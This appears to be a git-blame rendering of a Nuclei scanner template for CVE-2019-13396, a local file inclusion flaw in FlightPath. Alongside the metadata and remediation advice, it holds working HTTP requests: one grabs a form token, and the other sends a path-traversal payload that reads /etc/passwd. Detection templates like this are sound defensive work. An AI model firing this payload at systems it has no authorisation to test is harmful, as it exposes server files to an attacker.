2022-01-10 23:58:14 +00:00
|
|
|
id: CVE-2019-13396
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2022-01-10 23:58:14 +00:00
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: FlightPath - Local File Inclusion
|
2022-01-31 18:35:35 +00:00
|
|
|
author: 0x_Akoko,daffainfo
|
2022-05-17 09:18:12 +00:00
|
|
|
severity: medium
|
2022-07-26 13:45:11 +00:00
|
|
|
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
|
2023-09-06 12:53:28 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
2022-01-10 23:58:14 +00:00
|
|
|
reference:
|
2022-01-11 09:13:58 +00:00
|
|
|
- https://www.exploit-db.com/exploits/47121
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://getflightpath.com/node/2650
|
2022-07-26 13:45:11 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
|
2024-03-23 09:28:19 +00:00
|
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
|
|
- https://github.com/d4n-sec/d4n-sec.github.io
|
2022-01-10 23:58:14 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
|
|
cvss-score: 5.3
|
|
|
|
cve-id: CVE-2019-13396
|
|
|
|
cwe-id: CWE-22
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.0288
|
|
|
|
epss-percentile: 0.9075
|
2023-09-06 12:53:28 +00:00
|
|
|
cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: getflightpath
|
|
|
|
product: flightpath
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2019,flightpath,lfi,edb,getflightpath
|
2022-01-10 23:58:14 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-01-10 23:58:14 +00:00
|
|
|
- raw:
|
2022-01-31 18:35:35 +00:00
|
|
|
- |
|
|
|
|
GET /login HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2022-01-10 23:58:14 +00:00
|
|
|
- |
|
|
|
|
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2022-01-31 18:35:35 +00:00
|
|
|
Accept: application/json, text/plain, */*
|
|
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
2022-01-10 23:58:14 +00:00
|
|
|
|
2022-01-31 18:35:35 +00:00
|
|
|
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
|
2022-01-10 23:58:14 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-01-31 18:35:35 +00:00
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
name: token
|
|
|
|
group: 1
|
|
|
|
regex:
|
|
|
|
- "idden' name='form_token' value='([a-z0-9]+)'>"
|
2023-07-11 19:49:27 +00:00
|
|
|
internal: true
|
|
|
|
part: body
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 490a004630440220474698615742c3b9befbda0e2bcb85bea35969f6c9f19e2bb2fd6a5cd02d2543022024e1f6e2bfaa043096ff492722e9f66622063a2d97e7fdff5b61c95c200bcd9f:922c64590222798bb761d5b6d8e72950
|